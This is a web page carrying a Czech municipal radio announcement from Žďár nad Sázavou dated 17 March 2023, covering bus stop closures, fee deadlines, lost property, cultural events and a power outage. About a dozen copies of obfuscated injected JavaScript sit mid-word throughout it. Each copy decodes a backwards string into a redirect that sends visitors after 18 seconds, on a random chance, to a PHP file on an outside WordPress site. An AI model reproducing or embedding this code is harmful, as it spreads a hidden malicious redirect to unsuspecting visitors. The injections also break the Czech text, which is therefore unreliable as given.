Rainbow page separator

Hlášení městského rozhlasu vysílaného dne 17. března 2023

Pátek, 17. března 2023

Z ÚŘADU

Odbor komunálních služeb oznamuje, že v souvislosti s úplnou uzavírkou ulice Jamská bude do 30. dubna 2024 včetně zrušena bez náhrady zastávka MHD Novoměstská pro linku č. 3.

Vedení MHD:

– linka č. 3 bude vedena přes propojku ulic Novoměstská a Jamská v nové průmyslové zóně, nejbližší zastávka je Neumannova.

Dále odbor komunálních služeb oznamuje, že v souvislosti s úplnou uzavírkou části komunikace v Nákupním parku na ulici Brněnská bude od pondělí 20. března 2023 do odvolání, nejdéle však do 30. dubna 2024 včetně, zrušena bez náhrady zastávka MHD Brněnská Nákupní park.

Nebližší zastávka:

– Brněnská policie pro směr z au$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tobusového nádraží 

– Jihlavská ZDAR pro směr na au$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tobusové nádraží

Podle průběhu stavebních prací a situace na stavbě je možné dočasné obnovení obsluhy zastávky Brněnská Nákupní park, informace budou vždy v předstihu zveřejněny na dotčené zastávce a webech města a dopravce. Děkujeme za pochopení

Odbor majetkoprávní upozorňuje na úhradu nájemného za rok 2023 za pronájem pozemků ve vlastnictví města Žďáru nad Sázavou pod řadovými Prefa garážemi a za zahrádky u by$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tových domů, které je splatné každoročně vždy do 31. března na účet města Žďáru nad Sázavou s uvedením variabilního symbolu a jména nájemce a adresy bydliště. Úhradu je možno zaplatit také na pokladně MěÚ v ho$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovosti nebo platební kar$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tou. Případné dotazy a informace poskytne Marie Dvořáková, tel. 566688171.

Upozorňujeme držitele psů, že se blíží splatnost poplatku, který má být uhrazen do 31. března. Poplatek můžete uhradit bankovním převodem na účet města pod přiděleným variabilním symbolem, nebo ho$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tově na pokladně městského úřadu. Úhradu lze provést i platební kar$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tou. 

Bližší informace poskytne Miroslava Zachová na tel. čísle 566 688 147 nebo jsou k dispozici na webových stránkách města. 

ZTRÁTY A NÁLEZY:

Městský úřad, odbor finanční oznamuje, že na ztráty a nálezy byly předány klíč, korunka zubní,  karta ZDAR a jeden klíč. Seznam všech nalezených věcí je zveřejněn na úřední desce i na facebooku města. Bližší informace Vám poskytne Alena Benešová na tel. čísle 566 688 146 nebo osobně v kanceláři, 1. patro, dveře č. 35 – ztráty a nálezy. 

 

KULTURNÍ POZVÁNKY:

Knihovna Matěje Josefa Sychry Vás srdečně zve na tradiční Josefskou noc, která se uskuteční dnes 17.3. od 17:00 hod. Hosty budou spisovatelka Alice Horáčková, mykoložka Daniela Jiroušková a kapela Pod Peperek band.

Senior point knihovna pořádá 20.3.2023 od 8:00 hod. další cyklus přednášek Knihovna seniorům. Přednášejícími budou Stanislav Mikule a Kamila Dvořáková z Regionálního muzea města Žďár nad Sázavou.

Active – středisko volného času pro Vás v neděli 19. března 2023 pořádá zábavný rodinný festival na sále Active SVČ, Horní 2. Těšíme se na Vás mezi 9:00 a 17:00 hodinou. Čekají Vás interaktivní exponáty propagující vědu, stánky, kde si něco vyrobíte a tři pódiové science show a $NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to v 10:00, 13:00 a v 16:00 hodin. Přijďte s dětmi trávit čas aktivně. 

Knihovna Matěje Josefa Sychry Vás zve na výstavu fo$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tografií Pavla Remara - Dvorečky a Dvorky starého Žďáru, která je umístěna v Čechově domě do konce dubna 2023. Dále pak až do konce dubna 2023 je možné v Galerii u Sychry zhlédnout výstavu fo$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tografií Jaroslava Provazníka – Místa, co určitě znáte. 

V Regionálním muzeu na Tvrzi probíhá do 24. dubna 2023 výstava Retrohrátky. K vidění budou hračky éry socialismu a také interaktivní dětská herna. Uvidíte například Rubikovu kostku, plechovou berušku na klíček nebo céčka a některé věci si budete moct i vyzkoušet. Více informací najdete na webu muzea www.muzeumzdar.cz nebo na Facebooku.

Po celý březen probíhá v Knihovně Matěje Josefa Sychry celostátní akce Březen – měsíc čtenářů. Pro návštěvníky jsou připraveny besedy se spisovateli, tvůrčí dílna, tradiční Josefská noc i Noc s Andersenem. 

VÝLUKY:

EG.D, a. s. oznamuje přerušení dodávky elektrické energie dne 23.03.2023 od 7:30 do 14:30 hod. v lokalitě Žďár nad Sázavou 3, vypnutá oblast ul. Brodská č. o. 23, 25, 27.

 

 

KONEC HLÁŠENÍ